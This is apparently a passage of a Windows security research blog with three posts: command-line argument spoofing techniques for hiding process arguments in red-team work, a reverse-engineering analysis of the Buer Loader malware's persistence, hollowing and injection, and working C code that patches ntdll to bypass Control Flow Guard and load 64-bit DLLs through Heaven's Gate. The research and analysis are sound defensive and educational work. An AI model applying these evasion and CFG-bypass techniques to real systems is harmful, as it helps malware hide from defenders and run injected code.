Another place we can intercept is the pointer to BaseUnicodeCommandLine.Buffer itself (rather than BaseUnicodeCommandLine.Buffer). This requires some code patching and is likely easier to detect via hook scanners which compares with disk, however it is still stealthier than modifying the PEB or simply detouring the API with a jmp. The function always take the form of A1 xxxxxxxx C3 and we can patch it to point to a buffer that we control. This requires two levels of indirection, and we need to patch it with a pointer to a pointer to the command line buffer.

Method 3: Getting BaseDllInitialize to do the dirty work for us

Another option we have is as follow: first start the process suspended, patch the PEB with the to-be-hidden command line argument, patch the process entrypoint with EB FE, resume, wait, restore the original command line argument in PEB, suspend the main thread, restoring the original entrypoint and then resuming the thread. This would work as BaseInitializeDll will copy the hidden command line argument for us to BaseUnicodeCommandLine and BaseAnsiCommandLine and does not require us to interact with them directly. This would also hide the command line from Process Hacker and other similar tools as the patched command line parameter is only pointed to by the PEB for a brief moment, and they would have to somehow read at exactly the correct time to obtain this information.

Some final notes on this method

This solution is not going to work with processes that do not use the GetCommandLine API to retrieve it’s parameters. However, in practice I have not seen any tools or utilities which directly accesses the PEB to get this information about itself or use another method. If other methods exists to retrieve this information, it can probably be similarly addressed through some sort of tampering, and if that is not possible, simply hooking the API would normally suffice. Likewise, if the time ever comes when the API itself changes (which I doubt it will), one can simply switch to hooking to return a different command line parameter.

Some possible injection-less detection vectors would be through comparing the pointer in PEB with the pointer in BaseUnicodeCommandLine and checking the integrity of the GetCommandLine function. Alternatively, one could inject into the process and compare the output of the API with PEB. Either way, it is much more complicated to obtain the real command line parameter than it would be if we simply patched the PEB.

PoC

A PoC will be published when I have more time on my hand to clean up my experimental code base. However, the information in this post alone is more than enough for anyone looking to implement the trick to spoof command line arguments in a way that is not easily seen during a red team engagement.

Buer Loader, new Russian loader on the market with interesting persistence

Posted on

In the middle of November, a friend told me of a new malware being sold on Russian forums under the name “Buer Loader”. A translated copy of the thread where it is advertised can be found here. A google search revealed no one having mentioned “Buer Loader” before, nor provided an analysis of it. However, a forum administrator had already provided an analysis of the malware, in which the following screenshot of strings was provided.

With this, we can now hunt for Buer Loader samples. Based on the strings, a variety of samples that drop Buer Loader or is Buer Loader were found. Their hashes are listed below:

ddc4d9fa604cce434ba131b197f20e5a25deb4952e6365a33ac8d380ab543089 fcdf29266f3508bd91d2446f20a73a811f53e27ad1f3e9c1f822458f1f30b5c9
1db9d9d597636fb6e579a91b9206ac25e93e912c9fbfc91f604b7b1f0e18cc0a

MalwareHunterTeam also found a sample, though he did not refer to it by name. Strings for the file was posted by James_inthe_box.

A large number of samples, such as 0dd7e132fb5e9dd241ae103110d085bc4d1ef7396ca6c84a3b91dc44f3aff50f which was spotted on November 12th multiple times, are packed with Themida. We thankfully found one that wasn’t, with the hash of 6c694df8bde06ffebb8a259bebbae8d123effd58c9dd86564f7f70307443ccd0.

The file in question is a VB6 file, and can be found on Hybrid-Analysis.

After starting, the process executes a shellcode that is stored on the heap. Due to the process not having DEP enabled, the shellcode runs fine.

The shellcode does a typical process hollowing. The original image is unmapped below.

Next NtWriteVirtualMemory is called using DllCallFunction to write the malicious payload.

Dumping it from memory and trimming the overlay, we have a 27kb executable file that appears to be compiled with Visual Studio 2017. This would seem to be our original Buer Loader file. The TimeDateStamp indicates that it was compiled on Thu, 29 Aug 2019 05:48:03 UTC.

The file starts out with checking for debugger by reading PEB->BeingDebugged. If this check is passed, it checks for virtualization, and then enter the real code.

Here, the code uses sidt/sgdt to detect the presence of virtualization. More details on that can be found here.

The bot then enters the “real” main function.

Here, APIs are resolved and strings are decrypted. String decryption is done in a slightly peculiar manner, rather than passing a string directly to the decryption function the pointer to the WORD before it is passed. The first WORD is then ignored, and the rest is decrypted. In order to facilitate easy IDA reference searches, I opted to create a simple struct so that both the call to decrypt and the reference to the strings are in one place.

Interestingly, IDA did not detect the prototype of decrypt_str (and several other functions) correctly, and ignored the parameter passed in ECX. When the file was originally loaded, the original prototype was “unsigned int __cdecl decrypt_str(int length)”. Changing it to “void __usercall decrypt_str(int length, strdec_header *encryptedStr)” is necessary for IDA to decompile the function and calls to it successfully.

I modified an IDAPython script for decrypting strings (a few strings will fail due to duplicates or unicode, but the vast majority works fine). The script can be found on GitLab.

APIs are resolved by hash. The hashing algorithm is the typical ror13 algorithm that is often used in shellcodes.

After resolving the APIs and decrypting strings, the file checks to see whether it is operating in CIS countries. This is mandated as a part of the rule of the forum where the malware operates.

After the check is passed, the file adds itself to startup using a peculiar method. It first gathers the command required to create a task that runs the bot every 2 minutes, and then add that command to the RunOnce key.

After this, it enters the main loop and attempts to ensure persistence. To prevent the file from being deleted (or opened), it performs an interesting technique of forcing open a handle to the file inside the context of Explorer.exe. First, it gets a handle to explorer indirectly by first getting a handle with PROCESS_DUP_HANDLE privilege, and then using DuplicateHandle to create a handle with PROCESS_ALL_ACCESS. Thus far I have not seen this trick in malware but rather only in the cheating scene, perhaps indicative of the author’s involvement in such areas.

After this, it creates a handle to it’s own file with dwSharing set to 0 (thus preventing any other process from accessing the file), and duplicates the handle into the explorer process.

A rather unique choice of persistence that I have not observed before. Interestingly, it would appear that this effectively blocks Hybrid Analysis from reading the file (despite their analysis operating primarily at ring 0), with reports not displaying the file icon. Possibly part of their analysis currently runs from usermode and as a result was blocked by this.

At this point in the analysis, I found out that ProofPoint published an analysis of the loader a few hours before. As such, I’ll refer to their description of the HTTP requests and focus instead on how commands are handled.

The command handling function is decompiled relatively unclean, due to it’s size and the amount of switches and conditions IDA did not do a terrific job, however the decompilation serves it’s purposes. A few things of note:

  • A lot of commands result in the process exiting, and as such SpawnInstanceOfSelf is called beforehand to create another instance of Buer before the command is executed. It is unclear why the loader could not perform the hollowing and continue execution.
  • my_string_compare is equivalent to lstrcmpW and returns 0 if the string matches.
  • Strings are duplicated a lot for unknown reasons.

Memload

Memload attempts a very basic process hollowing if the file successfully spawns another instance of itself. API callchain: CreateProcessW->GetThreadContext->ZwUnmapViewOfSection (optional)->VirtualAllocEx->WriteProcessMemory->NtQueryIformationProcess->SetThreadContext->ResumeThread->CloseHandle->ExitProcess.

LoadDllMem

Depending on the option set and whether it is running under WoW64 or not, LoadDllMem will either “inject” the DLL into itself (by using GetCurrentProcess/INVALID_HANDLE_VALUE as the handle) or repeat the trick of stealing explorer’s handle from itself. The injection is fairly standard, if 64 bit is set it will use heaven’s gate and it will use the normal API otherwise.

To initialize the DLL, a bootstrap shellcode is injected and called. A structure with pointers to the DLL and function pointers are passed to it.

Update

The update mechanism of Buer Loader is relatively simple, and there is not much to say about it.

In conclusion, Buer is a new loader on the Russian malware scene and is relatively complex (especially when contrasted against certain bots such as Amadey). It still show inconsistencies that indicate a developer who is not experienced with low level development however, and it’s anti-analysis methods (such as API hashing or string encryption) are easily defeated with the use of IDAPython.

Crowbar: Breaking through Heaven’s Gate

Posted on

I was re-reading some articles I had saved from a while back, mostly on stuff regarding the internal workings of ntdll and kernel32 and so on. One of them was Alex Ionescu’s Closing “Heaven’s Gate”, detailing the new Windows 10 exploit mitigation feature CFG and how it prevents one from loading a 64 bit DLL in a WoW64 process. The article ended with “Reopening the gate is left as an exercise to the reader 😉”, and I couldn’t find any existing solution posted for this (which is surprising considering the triviality of the solution) so I thought why not take a crack at it?

Short note before we get on with reopening Heaven’s Gate, all DLLs referred to are the 64 bit version, unless otherwise stated.

The problems we have to deal with

Based on the 2 main articles that discussed DLL loading through Heaven’s Gate, the first being George Nicolaou’s Knockin’ on Heaven’s Gate and the second being the aforementioned article, we have several problems. The first is getting to 64 bit and calling functions, which has already been done for us many times by many people. For this exercise I will be using ReWolf’s library.

The big problem starts after that with attempting to load kernel32. The first hurdle we have is defeating CFG and allow LdrpCallInitRoutine to call DllMain and bypassing the indirect call check.

The next problem we have is the addressing of kernel32. Nicolaou states that simply loading kernel32 at a different address is not enough, “since certain functions contained within ntdll require numerous structures from the library that are referenced using their absolute address. In addition the kernel32 library’s initialization function KernelBaseDllInitialize would fail to execute and raise an unhandled exception in the process”. We cannot deal with this problem simply by unmapping the VAD that blocks the x64 address space as they are now configured as NoChange and OneSecured.

The solution

There are a few possible solutions to the first problem of CFG, ranging from trivial to untrivial. To figure them out, let us review how CFG functions.

Per TrendMicro, files compiled with CFG enabled (in this case ntdll and kernel32) will call the function pointed to by __guard_dispatch_icall_fptr before an indirect call is made. At runtime, this would point to LdrpValidateUserCallTarget. In case the address is not valid, it will call LdrpHandleInvalidUserCallTarget which in turn calls RtlpHandleInvalidUserCallTarget.

Things are slightly different in ntdll, possibly due to the fact that TrendMicro’s article was based on the 32 bit ntdll whereas we care only about the 64 bit ntdll: __guard_dispatch_icall_fptr is not overwritten with LdrpValidateUserCallTarget but instead LdrpDispatchUserCallTarget, which takes 1 argument in RAX that represents the icall target.

LdrpDispatchUserCallTarget checks the target address’s validity, if it is valid then the call is dispatched. If that fails, it will instead jump to LdrpHandleInvalidUserCallTarget.

LdrpHandleInvalidUserCallTarget then tries to call RtlpHandleInvalidUserCallTarget, and if the call succeeds it jumps to the target in RAX.

RtlpHandleInvalidUserCallTarget will perform several checks:

if ( RtlGuardAllowSuppressedCalls && (unsigned __int8)RtlpGuardIsSuppressedAddress() )
  {
    RtlpGuardGrantSuppressedCallAccess();
  }
  else if ( !(unsigned int)LdrControlFlowGuardEnforcedWithExportSuppression()
         || !(unsigned __int8)RtlGuardIsExportSuppressedAddress(v1)
         || (signed int)RtlpUnsuppressForwardReferencingCallTarget(v1) < 0 )
  {
    RtlFailFast2(10i64, v1);
  }

RtlpGuardGrantSuppressedCallAccess? Could we not use that (or ZwSetInformationVirtualMemory, which underlies it) to make whatever memory we want a valid icall target? Not quite. There are 2 main problems with this:

  1. We wouldn’t be able to call this between kernel32’s initial loading and LdrpCallInitRoutine checking the validity of the icall address. Well, we could by hooking, but that is an overly complicated solution.
  2. If we somehow manage to do so anyways, ZwSetInformationVirtualMemory would call MiCommitVadCfgBits to set the address to valid. However, MiCommitVadCfgBits does a nasty trick as Ionescu points out: if the address is in the 32 bit address space it will not mark it on the 64 bit bitmap but rather the 32 bit bitmap. This is why the entrypoint of kernel32 is not marked in the first place even though we loaded it with LdrLoadDll: the wrong bitmap is set.

The other solution at this level then would be failing the later checks so that RtlFailFast2 is never called. However, tampering with 3 separate functions is too much work. Thus, we pick the most trivial solution: overwriting ntdll!LdrpValidateUserCallTarget with a simple jmp rax. Since ntdll’s NtProtectVirtualMemory function does not perform any icalls, we can easily use ReWolf’s existing library to patch LdrpDispatchUserCallTarget and LdrpDispatchUserCallTarget (the later being likely unnecessary but it is better to err on the safe side).

DWORD64 pLdrpValidateUserCallTarget = GetProcAddress64(hNtdll64, "LdrpDispatchUserCallTarget");
	DWORD old_protect;
VirtualProtectEx64(INVALID_HANDLE_VALUE, pLdrpValidateUserCallTarget, 1, PAGE_EXECUTE_READWRITE, &old_protect);
	DWORD ret_instruction = 0xc3;
	X64Call(pmemcpy_s, 4, (DWORD64)pLdrpValidateUserCallTarget,
		(DWORD64)1,
		(DWORD64)&ret_instruction,
		(DWORD64)1);
VirtualProtectEx64(INVALID_HANDLE_VALUE, pLdrpValidateUserCallTarget, 1, old_protect, &old_protect);DWORD64 pLdrpDispatchUserCallTarget = GetProcAddress64(hNtdll64, "LdrpDispatchUserCallTarget");
VirtualProtectEx64(INVALID_HANDLE_VALUE, pLdrpDispatchUserCallTarget, 1, PAGE_EXECUTE_READWRITE, &old_protect);
char jmprax[] = { 0xff, 0xe0 };
X64Call(pmemcpy_s, 4, (DWORD64)pLdrpDispatchUserCallTarget,
		(DWORD64)2,
		(DWORD64)&jmprax,
		(DWORD64)2);
VirtualProtectEx64(INVALID_HANDLE_VALUE, pLdrpDispatchUserCallTarget, 1, old_protect, &old_protect);

Voila, our problem with CFG is thrown out of the window.

What about the address base problem? Well, it appears to no longer apply on Windows 10 for unknown reason. All three important DLLs, kernel32, kernelbase and ntdll has the same default address (0x0000000180000000) and are all truly relocatable.

However, should the DLL’s ImageBase be different and kernel32 being required to load at the same address (which should pretty much never happen due to ASLR), a naive (and possibly very unsafe) solution would be to disassemble all of the instructions in ntdll’s .text section and relocating the pointer to the appropriate address. But since it is unlikely that Microsoft will roll back ASLR compatibility for kernel32/kernelbase any time soon, we should not have to worry about this issue.

With all of our problems resolved, we can load kernel32 successfully.

To verify that the loaded DLL function as expected, we call kernel32!CreateProcessW launch a simple program (in this case the program is a FASM hello world).

We could also now load a shellcode that would in turn map a 64 bit binary that is compiled with CFG enabled without any problems.

Some issues remain

This technique is not perfect and several issues remain that need to be addressed.

  1. It doesn’t work under Visual Studio’s debugger. It is unknown why this issue exists (I do not intend to debug a debugger any time soon), but LdrLoadDll will always return 0xc0000142/STATUS_DLL_INIT_FAILED.
  2. Loading Kernel32 into a console process will result in another console window being initialized. Not a major problem, but could be very annoying.
  3. The solution might not be 100% safe. If a different ntdll version uses a different register for passing the address/jumping, things will fail.
  4. It will not work and will crash on non-Windows 10 machines, so perhaps a more comprehensive library could be made combining both this an Nicolaou’s unmapping method.
  5. While CreateProcessW works, some functions still do not function for now. A quick test with user32!MessageBoxW resulted in a crash.

The cause of the crash is unknown, but it is unlikely that anyone would specifically want to create an user interface through Heaven’s Gate anyways, and if they do (and succeed) it would be great to see the solution.

View the full code on Gitlab.

Edit

I attempted to run the code without the patch and somehow, it still works! Based on Ionescu’s article, this was not supposed to be the case, as MiSelectCfgBitMap should not allow this to happen!

cfg

Any private memory allocations below the 64-bit boundary will be marked only in the 32-bit bitmap, while the opposite applies to the 64-bit bitmap […] in a CFG-aware NTDLL.DLL, is that LdrpCallInitRoutines will perform a CFG bitmap check before calling the DllMain of this DLL. As the DLL will be loaded in 32-bit address space, the WoW64 CFG bitmap will be marked, and not the Native CFG bitmap — causing the 64-bit NTDLL to believe that DllMain is not a valid relative call target, and crash the process.

From Ionescu’s post

It turns out that we both missed one of the checks in there, MiSelectBitMapForImage. As it would turn out, the function would return 3 if the image is 64 bit, regardless of where it was loaded

This would in turn cause MiSelectCfgBitMap to select the correct 64 bit bitmap.

As a result, loading DLLs through LdrLoadDll would still work, but the manual mapping of DLLs that have CFG enabled that would fail. Because of this, this code would primarily be useful for doing that and allowing manual mappers for 64 bit libraries to run inside 32 bit processes (provided they are position independent and do not import from anything other than ntdll). So this patching code isn’t necessary at all for calling LdrLoadDll, but required for loading DLLs that were not dropped to disk.